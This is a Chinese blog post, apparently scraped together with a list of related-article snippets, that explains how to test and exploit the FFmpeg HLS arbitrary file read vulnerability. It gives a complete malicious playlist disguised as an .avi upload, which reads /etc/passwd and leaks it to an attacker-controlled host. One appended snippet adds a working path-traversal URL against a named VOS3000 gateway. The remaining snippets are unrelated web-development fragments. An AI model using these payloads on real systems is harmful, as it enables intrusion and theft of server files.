FFmpeg文件读取漏洞测试及利用详解

昨天经历过ImageMagick命令执行漏洞的洗礼之后,今天又有FFmpeg文件读取漏洞,真是激情的一周啊!

看了老外写的文章,大概理解的利用方式如下:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
以上内容保存成test.avi,是用来上传到被攻击服务器的。

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.111cn.net

以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:


 

会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

时间: 2024-08-02 02:33:18

FFmpeg文件读取漏洞测试及利用详解的相关文章

FFMPEG任意文件读取漏洞靶场搭建过程

本文讲的是FFMPEG任意文件读取漏洞靶场搭建过程, 丑化说在前头,我这人有一癖好,就是研究一些已经过时的东西,发一些过时的文章.文章之前就写好了,只是一直没发出来充数.距离FFMPEG任意文件读取漏洞发布的时间已经过去很久了,记得刚出来那会儿国内几个大型的视频网站都有这个问题.靶机是之前为了一个比赛场景搭建的,作为环境搭建的初探者,主要介绍下自己在搭建这个环节过程中遇到的一些坑. 1.  搭建需求 搭建一个FFMPEG任意文件读取漏洞靶场,可用于漏洞练习或者攻防题目. 2.  Win2003下

FFmpeg任意文件读取漏洞分析

本文讲的是FFmpeg任意文件读取漏洞分析,6月24号的时候hackerone网站上公布了一个ffmpeg的本地文件泄露的漏洞,可以影响ffmpeg很多版本,包括3.2.2.3.2.5.3.1.2.2.6.8等等. hackerone网站上的漏洞介绍: https://hackerone.com/reports/226756.与之相关联的还有其他几篇hackerone上的漏洞报告:https://hackerone.com/reports/243470.https://hackerone.com

GlassFish任意文件读取漏洞跟踪

[漏洞描述] 本文讲的是GlassFish任意文件读取漏洞跟踪,GlassFish 是一款用于构建 Java EE的应用服务组件.2015年10月,被爆出通用任意文件读取漏洞.利用这个漏洞,攻击者可读取服务器上任意文件.用户可自行到GlassFish官方网站下载更新修复. [趋势跟踪] 根据我们在全球部署的蜜罐捕获的数据显示,针对GlassFish的攻击从来没有停止过,POC在1月14日 公布之后,攻击达到了顶峰,下图为最近两周蜜罐捕获的攻击趋势. 提取一个月内针GlassFish进行了全网大规

某语音网关系统任意文件读取漏洞

-,-偶遇 昆石网络技术有限公司VOS3000虚拟运营支撑系统 任意文件读取漏洞 众测时偶遇的.. 直接上案例吧 **.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://**.**.**.**/%c0%ae%c0%ae/%c0%ae%c

JavaWeb实现文件上传与下载实例详解_java

 在Web应用程序开发中,文件上传与下载功能是非常常用的功能,下面通过本文给大家介绍JavaWeb实现文件上传与下载实例详解. 对于文件上传,浏览器在上传的过程中是将文件以流的形式提交到服务器端的,如果直接使用Servlet获取上传文件的输入流然后再解析里面的请求参数是比较麻烦,所以一般选择采用apache的开源工具common-fileupload这个文件上传组件.这个common-fileupload上传组件的jar包可以去apache官网上面下载,common-fileupload是依赖于

基于BootStrap Metronic开发框架经验小结【五】Bootstrap File Input文件上传插件的用法详解_javascript技巧

Bootstrap文件上传插件File Input是一个不错的文件上传控件,但是搜索使用到的案例不多,使用的时候,也是一步一个脚印一样摸着石头过河,这个控件在界面呈现上,叫我之前使用过的Uploadify 好看一些,功能也强大些,本文主要基于我自己的框架代码案例,介绍其中文件上传插件File Input的使用. 1.文件上传插件File Input介绍 这个插件主页地址是:http://plugins.krajee.com/file-input,可以从这里看到很多Demo的代码展示:http:/

c++中.dll与.lib文件的生成与使用的详解_C 语言

c++中.dll与.lib文件的生成与使用的详解 -------------------------------------------------------------------------------- 两种库: • 包含了函数所在的DLL文件和文件中函数位置的信息(入口),代码由运行时加载在进程空间中的DLL提供,称为动态链接库dynamic link library.• 包含函数代码本身,在编译时直接将代码加入程序当中,称为静态链接库static link library.共有两种链

jQ处理xml文件和xml字符串的方法(详解)_jquery

1.xml文件 <?xml version="1.0" encoding="utf-8" ?> <root> <book id="1"> <name>锋利的jQuery1</name> <author>XXX1</author> <price>250</price> </book> <book id="2&quo

php判断文件是否存在file_exists 与 is_file详解

php教程判断文件是否存在file_exists 与 is_file详解 $file ='新建 文本    文档.txt'; $file1 ='a.txt'; list($name,$ext) = explode('.',$file); echo $name;   if( is_file( $name.'.txt' ) ) {  echo 'file存在'; } if( file_exists( $file1 ) ) {  echo 'file1存在'; }